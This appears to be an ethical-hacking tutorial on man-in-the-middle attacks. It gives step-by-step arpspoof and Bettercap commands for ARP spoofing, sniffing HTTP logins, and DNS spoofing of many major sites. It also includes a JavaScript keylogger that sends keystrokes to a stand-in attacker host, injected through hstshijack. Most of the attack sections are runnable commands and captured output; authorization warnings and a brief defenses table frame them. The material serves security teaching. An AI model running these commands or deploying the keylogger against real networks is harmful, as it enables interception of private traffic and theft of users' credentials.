Man-in-the-Middle Attacks: Intercepting Network Communications

In our previous articles, we explored network discovery and wireless security. Today, we'll dive into one of the most powerful attack vectors in ethical hacking: Man-in-the-Middle (MITM) attacks. These attacks allow us to intercept and potentially manipulate communications between two devices.

MITM attacks are particularly dangerous because they can compromise the confidentiality and integrity of network communications, allowing attackers to eavesdrop on sensitive data, inject malicious content, or impersonate legitimate services.

Understanding Man-in-the-Middle Attacks

A Man-in-the-Middle attack occurs when an attacker secretly intercepts and relays communications between two parties who believe they are directly communicating with each other. The attacker can:

Eavesdrop on sensitive information (passwords, personal data)
Modify communications in transit
Impersonate either party in the communication
Inject malicious content into legitimate communications

Client
IP: 192.168.1.104
MAC: XX:XX:XX:XX:XX:XX

→

Attacker
IP: 192.168.1.105
MAC: XX:XX:XX:XX:XX:XX

→

Router
IP: 192.168.1.1
MAC: XX:XX:XX:XX:XX:XX

ARP Spoofing: The Foundation of MITM Attacks

ARP (Address Resolution Protocol)A protocol used to map IP addresses to MAC addresses on a local network is the mechanism that allows devices on a local network to find each other's MAC addresses. This protocol has a fundamental security flaw: it's stateless and doesn't verify the authenticity of ARP responses.

How ARP Works

When a device wants to communicate with another device on the same network:

It broadcasts an ARP request: "Who has IP address X.X.X.X?"
The device with that IP responds: "I have that IP! My MAC address is XX:XX:XX:XX:XX:XX"
The requesting device stores this mapping in its ARP cache
All future communications to that IP are sent to the MAC address in the ARP cache

Viewing ARP Cache

We can examine the current ARP cache to see IP-to-MAC mappings:

root@kali:~# arp -a _gateway (192.168.1.1) at 84:d8:1b:bf:71:2e [ether] on wlan0

This shows the router's IP (192.168.1.1) and its corresponding MAC address.

Exploiting ARP: The Spoofing Attack

ARP spoofing works by sending forged ARP responses to both the target device and the router:

We tell the target: "I am the router! Send all your traffic to my MAC address"
We tell the router: "I am the target! Send all responses to my MAC address"

This creates a situation where all communications between the target and router flow through our machine.

Important: ARP spoofing only works on local networks. The attacker must be connected to the same network segment as the target.

Step-by-Step ARP Spoofing Attack

Warning: Perform these steps only on networks you own or have explicit permission to test. Unauthorized network interception is illegal.

Step 1: Manual ARP Spoofing with arpspoof

We'll use the arpspoof tool to perform the attack:

# Tell the target we are the router root@kali:~# arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1 # Tell the router we are the target root@kali:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.104

After running these commands, the target's ARP cache changes:

# Before attack C:\Users\IEUser>arp -a Interface: 192.168.222.141 --- 0x5 Internet Address Physical Address Type 192.168.222.2 00-50-56-f9-f6-db dynamic # After attack C:\Users\IEUser>arp -a Interface: 192.168.222.141 --- 0x5 Internet Address Physical Address Type 192.168.222.2 00-0c-29-1d-1f-1c dynamic

The target now believes the router's MAC address has changed to the attacker's MAC address.

Step 2: Enable IP Forwarding

By default, our Kali machine won't forward packets. We need to enable IP forwarding so traffic can flow between the target and router:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Now the target can access the internet normally, but all their traffic flows through our machine!

Using Bettercap for Advanced MITM Attacks

Bettercap is a powerful, modular framework for MITM attacks that provides many advanced features beyond basic ARP spoofing.

Initial Setup and Network Discovery

root@kali:~# bettercap -iface eth0 192.168.222.0/24 > 192.168.222.140 » net.probe on 192.168.222.0/24 > 192.168.222.140 » [03:34:56] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe 192.168.222.0/24 > 192.168.222.140 » [03:34:56] [sys.log] [inf] net.probe probing 256 addresses on 192.168.222.0/24 192.168.222.0/24 > 192.168.222.140 » [03:34:56] [endpoint.new] endpoint 192.168.222.254 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.). 192.168.222.0/24 > 192.168.222.140 » [03:34:56] [endpoint.new] endpoint 192.168.222.141 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.). 192.168.222.0/24 > 192.168.222.140 » [03:34:57] [endpoint.new] endpoint 192.168.222.1 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).

We can view all discovered devices:

192.168.222.0/24 > 192.168.222.140 » net.show ┌─────────────────┬───────────────────┬─────────┬──────────────┬────────┬────────┬──────────┐ │ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │ ├─────────────────┼───────────────────┼─────────┼──────────────┼────────┼────────┼──────────┤ │ 192.168.222.140 │ XX:XX:XX:XX:XX:XX │ eth0 │ VMware, Inc. │ 0 B │ 0 B │ 03:32:06 │ │ 192.168.222.2 │ XX:XX:XX:XX:XX:XX │ gateway │ VMware, Inc. │ 7.9 kB │ 7.0 kB │ 03:32:07 │ │ 192.168.222.1 │ XX:XX:XX:XX:XX:XX │ │ VMware, Inc. │ 4.9 kB │ 1.6 kB │ 03:36:26 │ │ 192.168.222.141 │ XX:XX:XX:XX:XX:XX │ │ VMware, Inc. │ 24 kB │ 16 kB │ 03:35:37 │ │ 192.168.222.254 │ XX:XX:XX:XX:XX:XX │ │ VMware, Inc. │ 0 B │ 1.5 kB │ 03:34:56 │ └─────────────────┴───────────────────┴─────────┴──────────────┴────────┴────────┴──────────┘

Configuring and Starting ARP Spoofing

Bettercap provides comprehensive ARP spoofing capabilities:

192.168.222.0/24 > 192.168.222.140 » help arp.spoof arp.spoof (not running): Keep spoofing selected hosts on the network. arp.spoof on : Start ARP spoofer. arp.ban on : Start ARP spoofer in ban mode, meaning the target(s) connectivity will not work. arp.spoof off : Stop ARP spoofer. arp.ban off : Stop ARP spoofer. Parameters arp.spoof.fullduplex : If true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail). (default=false) arp.spoof.internal : If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the external network. (default=false) arp.spoof.skip_restore : If set to true, targets arp cache won't be restored when spoofing is stopped. (default=false) arp.spoof.targets : Comma separated list of IP addresses, MAC addresses or aliases to spoof, also supports nmap style IP ranges. (default=) arp.spoof.whitelist : Comma separated list of IP addresses, MAC addresses or aliases to skip while spoofing. (default=)

Capturing and Analyzing Network Traffic

Network Sniffing with Bettercap

Once we've established the MITM position, we can start capturing network traffic:

192.168.222.0/24 > 192.168.222.140 » net.sniff on

Bettercap will now display all intercepted HTTP traffic:

192.168.222.0/24 > 192.168.222.140 » [04:29:46] [net.sniff.http.request] http MSEDGEWIN10.local POST testphp.vulnweb.com/userinfo.php POST /userinfo.php HTTP/1.1 Host: testphp.vulnweb.com Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0 Referer: http://testphp.vulnweb.com/login.php Connection: keep-alive Content-Length: 34 Origin: http://testphp.vulnweb.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 uname=masaaki&pass=passworddemotry 192.168.222.0/24 > 192.168.222.140 » [04:29:46] [net.sniff.http.response] http 44.228.249.3:80 302

In this example, we successfully captured login credentials sent over HTTP.

Limitation: This technique only works with unencrypted HTTP traffic. HTTPS traffic is encrypted and cannot be read without additional techniques like SSL stripping.

Using Caplets for Automated Attacks

Bettercap allows us to create "caplets" - script files that automate complex attack sequences. Create a file called spoof.cap:

# spoof.cap - Automated MITM attack script net.probe on set arp.spoof.fullduplex true set arp.spoof.targets 192.168.222.141 arp.spoof on net.sniff on

Run the caplet:

root@kali:~/Downloads# bettercap -iface eth0 -caplet spoof.cap bettercap v2.32.0 (built for linux amd64 with go1.22.1) [type 'help' for a list of commands] [07:01:56] [sys.log] [inf] gateway monitor started ... [07:01:56] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe [07:01:56] [sys.log] [inf] net.probe probing 256 addresses on 192.168.222.0/24 [07:01:56] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail. [07:01:56] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets. [07:01:56] [endpoint.new] endpoint 192.168.222.141 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.). [07:01:56] [endpoint.new] endpoint 192.168.222.1 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.). [07:01:56] [endpoint.new] endpoint 192.168.222.254 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.). 192.168.222.0/24 > 192.168.222.140 »

The attack is now running automatically with all configured parameters.

DNS Spoofing: Redirecting Traffic

DNS spoofing allows us to redirect domain name resolutions to IP addresses we control, enabling phishing attacks and content injection.

Setting Up DNS Spoofing

First, ensure our web server is running:

root@kali:~/Downloads# service apache2 start

Configure DNS spoofing in Bettercap:

192.168.222.0/24 > 192.168.222.140 » set dns.spoof.all true set dns.spoof.domains example-website.tech 192.168.222.0/24 > 192.168.222.140 » dns.spoof on [08:12:04] [net.sniff.mdns] mdns fe80::9eaf:a634:bc9f:e2d1 : A query for wpad.local [08:12:04] [net.sniff.mdns] mdns 192.168.222.1 : A query for wpad.local [08:12:04] [sys.log] [inf] dns.spoof example-website.tech -> 192.168.222.140

Now when the target visits example-website.tech, they'll be redirected to our machine (192.168.222.140) instead of the real website.

Advanced DNS Spoofing with Multiple Domains

We can target multiple domains by modifying the hstshijack caplet:

set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js set dns.spoof.domains twitter.com,*.twitter.com,facebook.com,*.facebook.com,apple.com,*.apple.com,ebay.com,*.ebay.com,*.linkedin.com,linkedin.com,*.example-website.com,example-website.com,*.google.ie,google.ie,*.stackoverflow.com,stackoverflow.com,*.avg.com,avg.com,*.instagram.com,instagram.com,*.tiktok.com,tiktok.com,*.bbc.com,bbc.com,*.cnn.com,cnn.com,*.microsoft.com,microsoft.com,*.reddit.com,reddit.com,*.amazon.com,amazon.com,*.github.com,github.com,*.gitlab.com,gitlab.com http.proxy on dns.spoof on

Phishing Warning: This technique is commonly used to create fake login pages that capture user credentials. Always use this only for authorized security testing.

Code Injection: Manipulating Web Content

Once we're intercepting traffic, we can inject malicious JavaScript code into web pages the target visits.

Creating JavaScript Payloads

Create a JavaScript file (e.g., keylogger.js) with your malicious code:

// keylogger.js - Capture keystrokes document.addEventListener('keydown', function(e) { // Send captured keystrokes to attacker's server var xhr = new XMLHttpRequest(); xhr.open('POST', 'http://attacker-server.com/log', true); xhr.send(JSON.stringify({ key: e.key, page: window.location.href, timestamp: Date.now() })); });

Configuring Code Injection

Modify the hstshijack caplet to include our payload:

set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*:/root/custom-payload.js

Run the enhanced attack:

192.168.222.0/24 > 192.168.222.140 » hstshijack/hstshijack 2025-11-24 08:39:11 inf hstshijack Generating random variable names for this session ... 2025-11-24 08:39:11 inf hstshijack Reading SSL log ... 2025-11-24 08:39:11 inf hstshijack Reading caplet ... 2025-11-24 08:39:11 inf hstshijack Module loaded. Commands hstshijack.show : Show module info. hstshijack.payloads > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js > *:/root/custom-payload.js

Now our JavaScript code will be injected into every page the target visits.

Packet Analysis with Wireshark

Wireshark is a powerful network protocol analyzer that allows detailed inspection of captured packets.

Using Wireshark for Traffic Analysis

Open Wireshark and select your network interface
Start capturing packets
Use filters to focus on specific traffic (e.g., http, tcp.port == 80)
Analyze individual packets to extract sensitive information

[Image: Wireshark interface showing captured HTTP packets with login credentials]

Protection Against MITM Attacks

Understanding these attacks helps us implement effective defenses:

Defense Strategy	Implementation	Effectiveness
HTTPS Everywhere	Use HTTPS for all web communications	High
Static ARP Entries	Configure static ARP entries for critical devices	High
Network Segmentation	Isolate sensitive systems on separate VLANs	High
ARP Monitoring	Deploy tools that detect ARP spoofing	Medium
Certificate Pinning	Applications should pin expected certificates	High
VPN Usage	Use VPNs for all sensitive communications	High

Legal and Ethical Considerations

Critical Warning: MITM attacks intercept private communications and are illegal without explicit authorization. These techniques should only be used:

On networks you own
With explicit written permission from network owners
During authorized security assessments
In educational environments with proper supervision

Conclusion

Man-in-the-Middle attacks represent one of the most significant threats to network security. By understanding how ARP spoofing, DNS spoofing, and code injection work, security professionals can better defend against these attacks.

The techniques demonstrated in this article—from basic ARP spoofing to advanced Bettercap caplets—show the sophistication of modern MITM attacks. However, they also highlight the importance of proper network security measures like encryption, monitoring, and segmentation.

Key Takeaways:

MITM attacks intercept communications between two parties
ARP spoofing manipulates IP-to-MAC address mappings
DNS spoofing redirects domain name resolutions
Code injection allows manipulation of web content
HTTPS provides crucial protection against eavesdropping
Always obtain proper authorization before testing these techniques

By mastering both the offensive techniques and defensive strategies, security professionals can build more resilient networks and better protect against real-world attacks.